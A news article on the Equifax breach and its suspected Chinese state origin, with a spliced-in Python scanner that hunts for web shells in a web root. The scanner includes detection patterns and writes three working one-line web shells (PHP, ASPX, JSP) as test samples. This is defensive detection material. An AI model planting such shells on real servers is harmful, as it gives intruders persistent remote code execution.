Early clues have emerged that suggest a state actor was behind the massive hack of Equifax earlier this month, with China suggested as a prime suspect.
The startling new details from the investigation into the data breach affecting 142 million Americans’ personal data came in a Bloomberg report on Friday citing more than a dozen people familiar with the probe.
Evidence against China includes the use of multiple sub-specialized hacking teams and hacking tools known to have Chinese interfaces, though experts caution the identity of the perpetrator is far from certain.
Unlike the criminal hacking groups loosely affiliated with the Russian government, China is known to have highly organized People's Liberation Army units dedicated to hacking foreign governments and companies.
Those units are believed to be behind numerous previous attacks targeting intellectual property, as well as personal data and medical data that could offer leverage on an intelligence source.
China is known to have highly organized People's Liberation Army units dedicated to hacking foreign governments and companies. PLA soldiers are seen in this file photo
New details emerge in the investigation into the Equifax data breach. Some investigators are convinced that China was behind the attack, but that has not yet been proven
The fateful events at Equifax began to unfold on March 6, when Apache published a fix for a known vulnerability in Apache Struts, its popular back-end software for web applications.
Hackers of all kinds watch carefully for new vulnerability fixes, because they expose flaws in the software that can be exploited in any version that hasn’t yet been updated.
The Struts vulnerability appeared on the Chinese security forum FreeBuf.com within 24 hours of the fix being published.
Days later, on March 10, hackers probing the internet for vulnerable systems got a hit at Equifax, and made their initial breach, sources told Bloomberg.
The hackers quickly began establishing back doors into the system, allowing them to regain access if the initial vulnerability was patched.
Eventually they created some 30 web shells serving as redundant back doors, a technique known to be favored by the Chinese.
One of the web shells used was China Chopper, which is widely used by Chinese hackers but also by other groups.
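As an added example from the defender's side, and not code from the article or from the investigation it reports, here is a small Python scanner that hunts for the kind of web shell the article describes: a short server-side script that passes attacker-supplied request input straight into a code evaluator, planted in a web root so the intruder keeps a way back in after the original hole is patched. The regex patterns, the list of script extensions, the size threshold and the sample files it writes into a temporary web root are all constructed for illustration; none of them are artifacts from the Equifax breach.

```python
"""Hunt for web-shell-style back doors in a web root (added example, defender's view).

A web shell is typically a tiny script that hands request input (a POST field,
a query parameter) straight to eval/exec/system. This scanner flags scripts that
do exactly that, and builds a constructed sample web root to run against.
"""
import os
import re
import tempfile
from typing import Dict, List

# (language, description, regex) triples for "request input reaches a code evaluator".
INDICATORS = [
    ("php", "eval/assert/system over request input",
     re.compile(r"\b(eval|assert|system|shell_exec|passthru)\s*\(\s*(stripslashes\s*\()?"
                r"\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("php", "preg_replace with /e modifier over request input",
     re.compile(r"preg_replace\s*\(.*?/e['\"].*?\$_(POST|GET|REQUEST)", re.I | re.S)),
    ("aspx", "eval over Request.Item",
     re.compile(r"\beval\s*\(\s*Request\.Item\b", re.I)),
    ("jsp", "Runtime.exec over a request parameter",
     re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(.*?request\.getParameter", re.I | re.S)),
]

# Looser heuristic: a very small script that both reads request input and calls an
# evaluator is worth a look even when the argument is obfuscated. Threshold is a guess.
SMALL_FILE_BYTES = 512
EVALUATOR = re.compile(r"\b(eval|assert|exec|system|passthru|shell_exec)\s*\(", re.I)
REQUEST_INPUT = re.compile(
    r"\$_(POST|GET|REQUEST|COOKIE)|Request\.(Item|Form|QueryString)|request\.getParameter", re.I)

SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}


def find_webshell_indicators(source: str) -> List[str]:
    """Return the reasons `source` looks like a web shell (empty list if it looks clean)."""
    reasons = []
    for lang, description, pattern in INDICATORS:
        if pattern.search(source):
            reasons.append(f"{lang}: {description}")
    if (len(source.encode()) <= SMALL_FILE_BYTES
            and EVALUATOR.search(source) and REQUEST_INPUT.search(source)):
        reasons.append("heuristic: tiny script combining request input and a code evaluator")
    return reasons


def scan_webroot(root: str) -> Dict[str, List[str]]:
    """Walk `root`; map each flagged script (path relative to root, '/' separators) to reasons."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    source = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            reasons = find_webshell_indicators(source)
            if reasons:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return findings


def build_sample_webroot() -> str:
    """Write a constructed web root to a temp dir: one benign page, three shell-like scripts."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        # Benign: reads request input but only echoes it, never evaluates it as code.
        "index.php": "<?php echo 'Hello, ' . htmlspecialchars($_GET['name'] ?? 'guest'); ?>\n",
        # Constructed one-line PHP shell: request body goes straight into eval().
        "images/cache.php": "<?php @eval($_POST['pw']); ?>\n",
        # Constructed ASPX shell of the same shape.
        "uploads/err.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>\n',
        # Constructed JSP variant handing a request parameter to the OS.
        "static/health.jsp": '<% Runtime.getRuntime().exec(request.getParameter("c")); %>\n',
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    for path, why in sorted(scan_webroot(sample_root).items()):
        print(f"{path}: {'; '.join(why)}")
```

Pattern matching of this kind is a starting point, not a verdict: it will miss shells that build the evaluator call from encoded strings, and it will flag legitimate code that evaluates request input (which is itself worth a review). In practice a hunt pairs it with file modification times in the web root, web server access logs showing POST requests to files that are never linked from the site, and a comparison against the application's known-good deployment manifest, because, as the article notes, an intruder who plants dozens of redundant shells only needs one to survive the cleanup.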
Using traffic data recovered after the hack was finally discovered on July 29, investigators found that the team that initially breached Equifax struggled to evade the company’s internal firewalls, but quickly handed off the job to a much more skilled team.
The second team used special tunneling tools to maneuver around firewalls, analyzing and cracking one database after the next, and creating their own map of where the most valuable data was stored.
That level of specialization is indicative of a large organization with a hierarchy of teams, like the Chinese military.
Eventually, the investigators found, the hackers began searching for data on specific individuals – a tactic that could either indicate a desire to leverage potential intelligence sources or find wealthy people to defraud.
But the criminal hackers who steal credit card data for profit are rarely the ones who use that data to commit fraud.
Instead, specialized infiltration hackers typically obtain as much personal and payment data as possible, and then sell it along in batches to other criminals through Dark Web marketplaces.
The stolen data on 143 million Americans has yet to appear on Dark Web criminal marketplaces, suggesting that it is in the hands of a state intelligence agency
Investigators say that none of the data stolen in the Equifax breach has appeared for sale on those marketplaces, which is alarming because it means the data is almost certainly in the hands of a state intelligence apparatus rather than profit-motivated criminals.
‘This wasn’t a credit card play,’ one investigator told Bloomberg. ‘This was a “get as much data as you can on every American” play.’
Searching for clues, on September 11 the FBI asked major banks to monitor small batches of credit card accounts for suspicious activity – in one case the accounts of just 20 people.
Investigators hope that any fraudulent activity on the accounts could give clues as to the breach perpetrators. It is unknown whether the accounts were those of people whom the hackers specifically sought information on.
In the meantime, no mass cancellation of credit cards has been issued, as typically happens when account information is known to be circulating among criminals.
A federal investigation and internal company probe into the breach are both ongoing.
Whether China or another state actor was behind the history-making attack on Americans’ data will likely remain uncertain at least until investigators conclude their efforts.